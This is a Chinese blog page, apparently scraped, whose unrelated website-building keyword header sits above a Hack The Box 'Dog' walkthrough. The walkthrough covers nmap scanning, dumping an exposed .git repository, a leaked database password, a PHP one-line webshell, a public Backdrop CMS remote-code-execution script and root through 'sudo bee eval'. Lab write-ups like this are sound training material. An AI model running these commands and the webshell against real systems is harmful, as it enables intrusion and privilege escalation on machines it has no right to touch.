企业官网建设流程全解析

企业手机网站建设案例,洛阳网站建设费用,郑州网页设计,百度营销appHTB Dog writeup大佬请忽略#xff01;信息收集nmapHttp.gitShell as www-dataShell as johncusackShell as root大佬请忽略#xff01; Dog攻击点#xff1a; 一#xff1a;.git信息泄露 二#xff1a;密码复用 三#xff1a;sudo 提权 信息收集 nmap └─$ nmap …HTB Dog writeup大佬请忽略信息收集nmapHttp.gitShell as www-dataShell as johncusackShell as root大佬请忽略Dog攻击点一.git信息泄露二密码复用三sudo 提权信息收集nmap└─$ nmap -p- --min-rate100010.10.11.58 Starting Nmap7.95(https://nmap.org)at2025-09-2311:06 CST Warning:10.10.11.58 giving up on port because retransmission cap hit(10). Nmap scan reportfor10.10.11.58 Host is up(0.45s latency). Not shown:65533closed tcp ports(reset)PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp Nmap done:1IP address(1hostup)scannedin99.47seconds└─$ nmap -p22,80 -sC -sV --min-rate100010.10.11.58 Starting Nmap7.95(https://nmap.org)at2025-09-2311:08 CST Nmap scan reportfor10.10.11.58 Host is up(0.44s latency). PORT STATE SERVICE VERSION22/tcpopensshOpenSSH8.2p1 Ubuntu 4ubuntu0.12(Ubuntu Linux;protocol2.0)|ssh-hostkey:|307297:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7(RSA)|25627:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b(ECDSA)|_25693:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb(ED25519)80/tcpopenhttp Apache httpd2.4.41((Ubuntu))|http-robots.txt:22disallowed entries(15shown)|/core/ /profiles/ /README.md /web.config /admin|/comment/reply /filter/tips /node/add /search /user/register|_/user/password /user/login /user/logout /?qadmin /?qcomment/reply|_http-generator: Backdrop CMS1(https://backdropcms.org)|_http-server-header: Apache/2.4.41(Ubuntu)|_http-title: Home|Dog|http-git:|10.10.11.58:80/.git/|Git repository found!|Repository description: Unnamed repository;edit thisfiledescriptionto name the...|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... Service Info: OS: Linux;CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done:1IP address(1hostup)scannedin22.39seconds靶机开放ssh服务的22端口和http服务的80端口http服务还暴漏robots.txt和.git文件操作系统是Ubuntu。Http发现域名dog.htb服务端框架Backdrop CMS。登录和密码重置页面。对这两个页面使用弱口令和简单的SQL注入验证均不成功。将域名dog.htb维护到/etc/hosts文件。使用域名访问和IP访问的web是一样的。echo10.10.11.58 dog.htb|sudotee-a /etc/hosts.git拉取git中的内容└─$ git-dumper http://dog.htb/.gitgit[-]Testing http://dog.htb/.git/HEAD[200][-]Testing http://dog.htb/.git/[200][-]Fetching .git recursively[-]Fetching http://dog.htb/.git/[200][-]Fetching http://dog.htb/.gitignore[404][-]http://dog.htb/.gitignore responded with status code404[-]Fetching http://dog.htb/.git/objects/[200]...[snip]...[-]Fetching http://dog.htb/.git/objects/fd/d86ca742a28075b3d04986a74d47766000b6fa[200][-]Sanitizing .git/config[-]Runninggitcheckout.Updated2873paths from the index展示代码分支状态没什么有价值信息。└─$gitstatus On branch master nothing to commit, working tree clean代码提交日志只初始化了一份代码。└─$gitlog commit 8204779c764abd4c9d8d95038b6d22b6a7515afa(HEAD -master)Author: rootdogdog.htbDate: Fri Feb721:22:1120250000 todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases收集代码中可能存在的用户名、密码和版本信息。└─$catsettings.php?php /** * file * Main Backdrop CMS configuration file. */ /** * Database configuration: * * Most sites can configure their database by entering the connection string * below. If using primary/replica databases or multiple connections, see the * advanced database documentation at * https://api.backdropcms.org/database-configuration */$databasemysql://root:BackDropJ2024DS2024127.0.0.1/backdrop;$database_prefix;...[snip]...└─$grep-rdog.htb../.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa rootdogdog.htb17389633310000 commit(initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases ./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa rootdogdog.htb17389633310000 commit(initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases ./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:tiffanydog.htbgrep-r version.-C3...[snip]... ./core/profiles/minimal/minimal.info-;Added by Backdrop CMS packaging script on2024-03-07 ./core/profiles/minimal/minimal.info-projectbackdrop ./core/profiles/minimal/minimal.info:version1.27.1 ./core/profiles/minimal/minimal.info-timestamp1709862662...[snip]...收集到数据库链接地址用户名root密码BackDropJ2024DS2024。Backdrop CMS可能的用户名dogdog.htb、tiffanydog.htb。尝试登录Backdrop CMS使用tiffanydog.htb/BackDropJ2024DS2024登录成功。Shell as www-databackdrop cms 1.27.1 manualFunctionally-Install new modules下载利用的tar包CSRF-to-RCE-on-Backdrop-CMS└─$tarxvf reference.tar -C reference reference/views/reference_plugin_display.inc reference/views/reference_plugin_row_fields.inc reference/views/reference.views.inc reference/views/reference_plugin_style.inc reference/tests/reference.test reference/tests/reference.admin.test reference/tests/reference.tests.info reference/tests/reference.autocomplete.test reference/shell.php reference/README.md reference/reference.module reference/reference.install reference/LICENSE.txt reference/reference.info reference/views/ reference/tests/ reference/└─$ls-la total76drwx------4VexCjfkNgNW5 VexCjfkNgNW54096Sep232021.drwxrwxr-x3VexCjfkNgNW5 VexCjfkNgNW54096Sep2317:21..-rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW518092Jun252021LICENSE.txt -rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW51768Jun252021README.md -rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW5323Jun252021reference.info -rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW5484Jun252021reference.install -rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW523598Jun252021reference.module -rw-r--r--1VexCjfkNgNW5 VexCjfkNgNW530Sep222021shell.php drwx------2VexCjfkNgNW5 VexCjfkNgNW54096Sep232021tests drwx------2VexCjfkNgNW5 VexCjfkNgNW54096Sep232021views一句话木马shell.php└─$catshell.php?php system($_GET[cmd]);?上传reference.tarINSTALLwebshellbackdrop cms 1.27.1 exploitgitclone https://github.com/rvizx/backdrop-rcecdbackdrop-rce└─$ python exploit.py http://10.10.11.58/ tiffanydog.htb BackDropJ2024DS2024[]logginginas user:tiffanydog.htb[]login successful[]enabling maintenance mode[]maintenance enabled[]payload archive: /tmp/bd_eny74cc4/rvz2ba58b.tgz[]fetching installer form[]uploading payload(bulk empty)[]initial upload post complete[]batchid14;sending authorize ‘do_nojs’ and ‘do’[]waitingforshell at: http://10.10.11.58/modules/rvz2ba58b/shell.php[]shell is live[]interactive shell –typeexitto quit VexCjfkNgNW510.10.11.58iduid33(www-data)gid33(www-data)groups33(www-data)Shell as johncusack密码复用BackDropJ2024DS2024└─$sshjohncusack10.10.11.58 johncusack10.10.11.58s password:...[snip]... johncusackdog:~$iduid1001(johncusack)gid1001(johncusack)groups1001(johncusack)Shell as rootsudo -l通过配置 /etc/sudoers允许普通用户以超级用户或其他用户身份执行特定命令利用 sudo 临时切换权限运行。johncusackdog:~$sudo-l[sudo]passwordforjohncusack: Matching Defaults entriesforjohncusack on dog: env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User johncusack may run the following commands on dog:(ALL:ALL)/usr/local/bin/beejohncusackdog:~$ bee --help Bee Usage: bee[global-options]command[options][arguments]Global Options: --root Specify the root directory of the Backdrop installation to use. If not set, will try tofindthe Backdrop installation automatically based on the current directory. --site Specify the directory name or URL of the Backdrop site to use(as definedinsites.php). If not set, will try tofindthe Backdrop site automatically based on the current directory. --base-url Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site. --yes, -y Answeryesto questions without prompting. --debug, -d Enablesdebugmode,inwhichdebugandlogtypemessages will be displayed(in addition to all other messages). Commands: CONFIGURATION config-export cex, bcex Export config from the site. config-get cget Get the value of a specific config option, or view all the config optionsina given file. config-import cim, bcim Import config into the site. config-set cset Set the value of an optionina config file. CORE download-core dl-core Download Backdrop core.installsi, site-install Install Backdrop and setup a new site. DATABASE db-drop sql-drop Drop the current database and recreate an empty database with the same details. This could be used prior toimportifthe target database hasmoretables than thesourcedatabase. db-export dbex, db-dump, sql-export, sql-dump Export the database as a compressed SQL file. This uses the --no-tablespaces option by default. db-import dbim, sql-import Import an SQLfileinto the current database. INFORMATIONhelpProvidehelpand examplesforbeeand its commands. log ws, dblog, watchdog-show Show database log messages. status st, info, core-status Provides an overview of the current Backdrop installation/site. version Display the current version of Bee. MISCELLANEOUS cache-clear cc Clear a specific cache, or all Backdrop caches.cronRun cron. maintenance-mode mm Enable or disable maintenance modeforBackdrop. PROJECTS disable dis, pm-disable Disable one ormoreprojects(modules, themes, layouts). download dl, pm-download Download Backdrop contrib projects.enableen, pm-enable Enable one ormoreprojects(modules, themes, layouts). projects pml, pmi, project, pm-list, pm-info Display information about available projects(modules, themes, layouts). uninstall pmu, pm-uninstall Uninstall one ormoremodules. ROLES permissions pls, permissions-list List all permissons of the modules. role-add-perm rap Grant specified permission(s)to a role. role-create rcrt Add a role. role-delete rdel Delete a role. role-remove-perm rrp Remove specified permission(s)from a role. roles rls, roles-list List all roles with the permissions. STATE state-get sg, sget Get the value of a Backdrop state. state-set ss, sset Set the value of an existing Backdrop state. THEMES theme-admin admin-theme Set the admin theme. theme-default default-theme Set the default theme. UPDATE update-db updb, updbst, updatedb, updatedb-status Show, and optionally apply, all pending database updates. USERS user-add-role urole, urol Add role to user. user-block ublk Block a user. user-cancel ucan Cancel/remove a user. user-create ucrt Create a user account with the specified name. user-login uli Display a loginlinkfora given user. user-password upw, upwd Reset the login passwordfora given user. user-remove-role urrole, urrol Remove a role from a user. user-unblock uublk Unblock a user.usersuls, user-list List all user accounts. ADVANCED db-query dbq Execute a query using db_query().evalev, php-eval Evaluate(run/execute)arbitrary PHP code after bootstrapping Backdrop. php-script scr Execute an arbitrary PHPfileafter bootstrapping Backdrop. sql sqlc, sql-cli, db-cli Open an SQL command-line interface using Backdrops database credentials.johncusackdog:/var/www/html$sudobeeevalsystem(id)uid0(root)gid0(root)groups0(root)johncusackdog:/var/www/html$sudobeeevalsystem(bash)rootdog:/var/www/html# exitexitippsec利用密码爆破拿到了密码感兴趣的师傅可以练习一下。Backdrop scan github密码爆破绕过搜索关键词